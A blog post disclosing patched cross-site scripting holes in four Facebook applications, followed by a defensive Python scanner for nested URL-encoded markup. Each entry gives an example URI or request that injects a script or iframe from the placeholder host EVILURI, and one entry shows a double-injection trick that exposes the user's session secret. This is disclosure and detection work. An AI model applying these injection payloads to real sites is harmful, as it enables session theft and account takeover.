FAXX Hacks: Previous Vulnerabilities

Before the first new report in the FAXX series, I thought I would begin by reviewing a few previous holes that have (mostly) already been patched.

FAXX Hack: FunSpace

Facebook Verified Application

Current Monthly Active Users: 8,527,725

Current Rank on Application Leaderboard: 20

Application Developer: Slide, Inc.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/crazyfunpix/header_iframe/?url=)%22%3E%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E%3Ca+href%3D%22(&CXNID=1000005.8NXC

FAXX Hack: SuperPoke!

Facebook Verified Application

Current Monthly Active Users: 2,097,148

Current Rank on Application Leaderboard: 71

Application Developer: Slide, Inc.

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/superpokey/sp_main/?CXNID=1000005.6NXC&fb_force_mode=iframe&error=%3Cscript+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E

FAXX Hack: SocialToo

Current Monthly Active Users: 1,835

Application Developer: Stay N’ Alive Productions, LLC

Vulnerability Status: Patched

Capable of Clickjacking Install: No

Example POST Request: http://apps.facebook.com/socialtoo/vanity?submit=Update&username=\"><fb:iframe src='http://EVILURI/'>

Notes: This application generally has extended permissions, such as status_update.

FAXX Hack: YellowPages.ca

Reported By: Uber0n at XSSed.com on March 22, 2009

Current Monthly Active Users: 1,198

Application Developer: Yellow Pages Group Co.

Vulnerability Status: Patched as of Sep. 2, 2009 (originally listed as Unpatched)

Capable of Clickjacking Install: No

Example URI: http://apps.facebook.com/yellowpagesca/?task=search&YP_what=%22%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.yellowpages.ca%2Fapp%2F%3Ftask%3Dsearch%26YP_what%3D%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E%253C%252Fscript%253E%2B%26YP_where%3DCanada%22%3E&YP_where=Canada

Notes: The above example demonstrates a double injection trick I began using for FBML applications. First, the hole is used to insert an <fb:iframe> tag into the FBML of the canvas page. Second, this inserted iframe loads the direct URI of the application page, with the hole exploited a second time to insert a script file, since the iframe loads as HTML rather than FBML. Since the domain of the iframe matches the application domain, the iframe receives the user’s session secret.
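For defenders reviewing request logs, the nesting described above shows up as markup that only appears after a second round of URL decoding. The following is an added example, not code from the original post or from any of the applications listed: a small scanner that peels encoding layers from each query parameter and reports the depth at which a tag appears. The function names, the tag list and the depth limit are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Tags injected by the example URIs on this page, plus plain <iframe>.
MARKUP = re.compile(r"<\s*(script|fb:iframe|iframe)\b", re.IGNORECASE)
MAX_DEPTH = 4  # assumption: how many extra encoding layers to peel

def scan_value(value):
    """Return [(depth, tag), ...]; depth 0 is the value as the app receives it."""
    hits, seen = [], set()
    for depth in range(MAX_DEPTH + 1):
        for match in MARKUP.finditer(value):
            tag = match.group(1).lower()
            if tag not in seen:
                seen.add(tag)
                hits.append((depth, tag))
        decoded = unquote_plus(value)
        if decoded == value:  # nothing left to decode
            break
        value = decoded
    return hits

def scan_uri(uri):
    """Map each query parameter that carries markup to its hits."""
    params = parse_qsl(urlsplit(uri).query, keep_blank_values=True)
    return {name: hits for name, value in params if (hits := scan_value(value))}

def is_nested(hits):
    """True when markup appears at more than one decode depth (double injection)."""
    return len({depth for depth, _ in hits}) > 1

# Example URIs copied from this page (EVILURI is the page's own placeholder).
FUNSPACE = ("http://apps.facebook.com/crazyfunpix/header_iframe/?url=)%22%3E%3Cscript"
            "+src%3D%22http%3A%2F%2FEVILURI%2F%22%3E%3C%2Fscript%3E%3Ca+href%3D%22("
            "&CXNID=1000005.8NXC")
YELLOWPAGES = (
    "http://apps.facebook.com/yellowpagesca/?task=search&YP_what=%22%3E%3Cfb%3Aiframe+src"
    "%3D%22http%3A%2F%2Ffacebook.yellowpages.ca%2Fapp%2F%3Ftask%3Dsearch%26YP_what%3D"
    "%2522%253E%253Cscript%2Bsrc%253D%2522http%253A%252F%252FEVILURI%252F%2522%253E"
    "%253C%252Fscript%253E%2B%26YP_where%3DCanada%22%3E&YP_where=Canada")

if __name__ == "__main__":
    for uri in (FUNSPACE, YELLOWPAGES):
        for name, hits in scan_uri(uri).items():
            print(name, hits, "nested" if is_nested(hits) else "single")
```

A hit at depth 1 or deeper means the value is harmless text where it first lands and becomes markup only when it is decoded again, which a filter that inspects the parameter once will miss.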
